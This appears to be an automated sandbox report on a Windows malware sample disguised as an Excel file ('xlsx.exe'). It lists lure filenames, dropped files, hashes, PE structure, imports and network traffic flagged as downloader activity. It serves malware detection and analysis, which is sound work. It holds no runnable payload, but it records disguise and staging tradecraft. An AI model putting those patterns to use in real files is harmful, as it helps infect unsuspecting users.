Joe Sandbox View:	Filename: ME-SPC-94.03.60.175.07.exe, Detection: malicious, Browse Filename: TEC-SPC-94.03.60.175.07.exe, Detection: malicious, Browse Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsqD111.tmp

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	1199146
Entropy (8bit):	3.3464346722807505
Encrypted:	false
SSDEEP:	6144:AP75ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Js9g5PNp0AJ2aJ4aKh:AP75ehxkWL8zz9Eo+2eIYBkWz5P4Ph
MD5:	88C3E9ED0EF59E29A94711546BC32ABC
SHA1:	30235C24491AF4AFA40967FB2E97E8C47A3A7C54
SHA-256:	41C07FDBD9838B799D5EF07E1C85045CBE0910B322D93D5C5298D558F61426BB
SHA-512:	1B2F1EA7976F98421061CF119BA047BAFF85567C3AECAC56E54F32A41A04A9355281BF3526B3A5A5852A26D8CD089DFBE39752B3D6B40E1DDAD6211D266D16B3
Malicious:	false
Reputation:	low
Preview:	........,...................\...............................................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	28
Entropy (8bit):	4.110577243331642
Encrypted:	false
SSDEEP:	3:iGAeTUHvn:lAeTUHv
MD5:	F6A80CF0B011E1638B38D8EAA2A9629B
SHA1:	30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
SHA-256:	AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
SHA-512:	E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
Malicious:	false
Preview:	[Access]..Setting=Disabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Aflare.Enk

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	28191
Entropy (8bit):	4.5554172315993275
Encrypted:	false
SSDEEP:	384:lU5Foko0Wy6buRWcJT8QEai+6m7AiWjSHk8Rco00LIkqRPonGlo:lU5ekoHyzxT8KT7PiKkK0hrKJ
MD5:	A8F95082B71E9CCC0A1B9D3285AB9125
SHA1:	B475ED39780310238995E4C1F3F7CEC555D8AC98
SHA-256:	0D0EBEBAF3EAA4D416399434511974EA882425CEBB01EC794C514CD329523C54
SHA-512:	10C7E33F12C8A6ECB6088B016651A9FADC1BF6108E15F00584E59DEDBD93CF602BAD52487EF31035BFA858D3A762CEC0BC5B88FF8F01AFC4BDA9189DC40DF0EC
Malicious:	false
Preview:	...T..i.........BB........;..._.;........ss..........................-.........p.fff..[......L..A.X...P.......ss...___.....D.#.....XX..^^^.....ddd.......... ..................n...........gggg.tttt....................FF.. .............kkk.........tt..................44..a............5..WWW...................:........nn........."..###......."""".......i..........................00..............2...uu........n..............Q.......V.........XXX........33......CCC.....................$..........4..............................qq..,.........T....\\\......EE......................................mm.............R..**.>>>.h.=.........m.........j..=.\|\|..............................+++.o.....................zzzzz.s.....!..................aa........../...TTT......L.........%.....................cccccc.9999.........X.@@@..J.....i.......N......!!....................G...........r.....................$...+.....u.7.I....""...{{...............................VVV....................HH.............b......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\Impieties200.bjr

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	207998
Entropy (8bit):	1.2479248406208852
Encrypted:	false
SSDEEP:	768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
MD5:	5C283F56F45AD89C5D82538EA09AC0F5
SHA1:	FA3736CF43F5841B9D4E28FF2024C17897EEF745
SHA-256:	D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
SHA-512:	2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
Malicious:	false
Preview:	..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\firsaarsfdselsdags.luv

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	443489
Entropy (8bit):	1.2463028275519636
Encrypted:	false
SSDEEP:	768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
MD5:	913964ACDFFFA24344A401D48E08C653
SHA1:	EE1E0AC79DA12D6439F9DF5B865347647473642A
SHA-256:	B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
SHA-512:	2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
Malicious:	false
Preview:	..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................\|........................&......'....N.....................................o............................8.....................................................................................................n...................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling\portitor.win

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	209062
Entropy (8bit):	1.2469617066336303
Encrypted:	false
SSDEEP:	768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
MD5:	607886D87859E45164D2959809AB5367
SHA1:	4E86EB72512D4C9BE32304E3A12B499D6A86084B
SHA-256:	A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
SHA-512:	A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
Malicious:	false
Preview:	...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................\|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................\|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\affodill.Hav

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	data
Category:	dropped
Size (bytes):	290478
Entropy (8bit):	7.563899642939822
Encrypted:	false
SSDEEP:	6144:1ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Jb:1ehxkWL8zz9Eo+2eIYBkWJ
MD5:	7C5950C0904C276B5EEA38CE56D01613
SHA1:	2B55A0A107564148DAFD55B58CE9842962DD273C
SHA-256:	2DF9631D6B7FFE6FF7DF858DB2953F7EA75AB9F37796B9531E4DFE587BA54FBA
SHA-512:	C82B984900CF00F055D0ACAAA6902189455F9DA4838DF0A9B82AF4E137F87AF68E941953D2039257F322F12FC0980B0B1D011A5F14619CF62FBB0F205D8D5C39
Malicious:	false
Preview:	.......uu....................iiii.....C...........2.............hhh....4..z...>>..(.........}}}}..........................EEE........W...............................................\|\|...RRR...3.........@.........\|.]...........................................r..888.............nnnnnn..............PPP........................#...~..............--....%%%%%%.../.......................ttt.......................,.................. ....d............................XX.W......WWWW..............QQ................v...............................#.....!!!............^^^................:::...L...{...bb...........j.a....7..............aaa..............................................tt..........u.RR.x..ZZ.NNN..n...........''''....X....LLL..a....ffff..........~~..T.............1...........KK................................KKKK..=..........]..l......../......QQ......UUUU........2....NNN.[[...........FF....M...$../.`..................)....@.......JJJJ.....e......<...................!...............b..

C:\Users\user\subacidity.lnk

Download File

Process:	C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Category:	dropped
Size (bytes):	922
Entropy (8bit):	3.5131109546340507
Encrypted:	false
SSDEEP:	12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRv8RMJsW+slmYXcuzJCN85v4t2YE:8QudO/9Q6jd9a6vDy3OcA24qy
MD5:	835EF96D9F21E737A29B55B119B32E7C
SHA1:	A4211042340681F64D4A6316F6857CCCF14DE65F
SHA-256:	A7225289785608B5C27B8B01851AB63EE02AF91A8D9AC25814BFD63D4C36A3A0
SHA-512:	07860938F330FC908BE6314286BCDE76D48EBBEA3FE118824F8D51A2CA2D76A888751AFAC709AFD368DB0F1331350CC91B91148037D3DABB3BF2D86E109DF17A
Malicious:	false
Preview:	L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.U.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.\.C.a.r.f.u.f.f.l.i.n.g.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.884499331746193
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	09-FD-94.03.60.175.07.xlsx.exe
File size:	530'598 bytes
MD5:	321a9608e5bf03bf63f4574d0df1a380
SHA1:	71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
SHA256:	c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
SHA512:	ea16ef04d171e09971b49a8ee2cb1a4082ae794db9e6e53b2e702815cd275c48a390866de53845acf817a167ec14b4bf4c8c79cb8f590c8759f0cc1577a3e7ae
SSDEEP:	12288:XRV78hkvtMm2pbzH3lzmBI9jD9Bu3faTXXes:I+vthovMO9jhBsiTXX7
TLSH:	EEB423063AD1D81AD15D9A364FB3C2BDC376EC745C188E077F303E5B6C32A914A7A296
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....n3T.................`.........Z3.......p....@

File Icon


Icon Hash:	0714262e34390f06

Static PE Info

General

Entrypoint:	0x40335a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Entrypoint Preview

Instruction
sub esp, 000002D8h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+14h], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000009h
mov dword ptr [004292B8h], eax
call 00007F7410922DCAh
mov dword ptr [00429204h], eax
push ebp
lea eax, dword ptr [esp+38h]
push 000002B4h
push eax
push ebp
push 004206A8h
call dword ptr [0040717Ch]
push 0040937Ch
push 00428200h
call 00007F7410922A35h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007F7410922A23h
push ebp
call dword ptr [0040710Ch]
push 00000022h
mov dword ptr [00429200h], eax
pop edi
mov eax, ebx
cmp word ptr [00434000h], di
jne 00007F741091FEB9h
mov esi, edi
mov eax, 00434002h
push esi
push eax
call 00007F7410922473h
push eax
call dword ptr [00407240h]
mov ecx, eax
mov dword ptr [esp+1Ch], ecx
jmp 00007F741091FFABh
push 00000020h
pop edx
cmp ax, dx
jne 00007F741091FEB9h
inc ecx
inc ecx
cmp word ptr [ecx], dx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4a000	0x132d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ec6	0x6000	60ec0c4d80dd6821cdaced6135eddfd5	False	0.6593424479166666	data	6.438901783265187	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202f8	0x600	99cdd6cde9adee6bf3b24ee817b4574b	False	0.4830729166666667	data	3.8340327961758165	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x20000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4a000	0x132d8	0x13400	6a5bbc33287fc34c026c3652aab40ca4	False	0.7685800527597403	data	6.977243320980138	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4a448	0xb1b3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9923501351915763
RT_ICON	0x55600	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4311203319502075
RT_ICON	0x57ba8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.48053470919324576
RT_ICON	0x58c50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5330490405117271
RT_ICON	0x59af8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.5647540983606557
RT_ICON	0x5a480	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.6353790613718412
RT_ICON	0x5ad28	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.5961981566820277
RT_ICON	0x5b3f0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.3176829268292683
RT_ICON	0x5ba58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.42124277456647397
RT_ICON	0x5bfc0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6453900709219859
RT_ICON	0x5c428	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.4274193548387097
RT_ICON	0x5c710	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States	0.4651639344262295
RT_ICON	0x5c8f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.5067567567567568
RT_DIALOG	0x5ca20	0x100	data	English	United States	0.5234375
RT_DIALOG	0x5cb20	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x5cc40	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x5cd08	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x5cd68	0xbc	data	English	United States	0.601063829787234
RT_VERSION	0x5ce28	0x1a4	data	English	United States	0.5642857142857143
RT_MANIFEST	0x5cfd0	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-16T18:05:19.641089+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49756	172.217.19.174	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 16, 2024 18:05:16.921926975 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:16.921984911 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:16.922077894 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:16.936881065 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:16.936903954 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:18.746984959 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:18.747076035 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:18.747769117 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:18.747826099 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:18.802337885 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:18.802376986 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:18.803350925 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:18.803512096 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:18.808106899 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:18.855334997 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:19.641060114 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:19.641134977 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:19.641163111 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:19.641204119 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:19.641324997 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:19.641402960 CET	443	49756	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:19.641452074 CET	49756	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:19.800636053 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:19.800683975 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:19.800738096 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:19.801204920 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:19.801219940 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:21.517611027 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:21.517735958 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:21.538772106 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:21.538795948 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:21.539777040 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:21.539860010 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:21.540265083 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:21.583386898 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.474832058 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.474903107 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.474921942 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.475050926 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.475393057 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.475451946 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.475476980 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.475518942 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.475616932 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:22.475733995 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.483896017 CET	49764	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:22.483916044 CET	443	49764	142.250.181.1	192.168.2.6
Dec 16, 2024 18:05:32.504925013 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:32.504972935 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:32.505033016 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:32.505456924 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:32.505475998 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:34.204242945 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:34.204339027 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:34.205327034 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:34.205449104 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:34.207003117 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:34.207010984 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:34.207360983 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:34.207521915 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:34.207942963 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:34.255333900 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.110671997 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.110745907 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:35.110759020 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.110801935 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:35.110809088 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.110850096 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:35.110863924 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.110909939 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:35.140551090 CET	49806	443	192.168.2.6	172.217.19.174
Dec 16, 2024 18:05:35.140582085 CET	443	49806	172.217.19.174	192.168.2.6
Dec 16, 2024 18:05:35.294743061 CET	49811	443	192.168.2.6	142.250.181.1
Dec 16, 2024 18:05:35.294791937 CET	443	49811	142.250.181.1	192.168.2.6
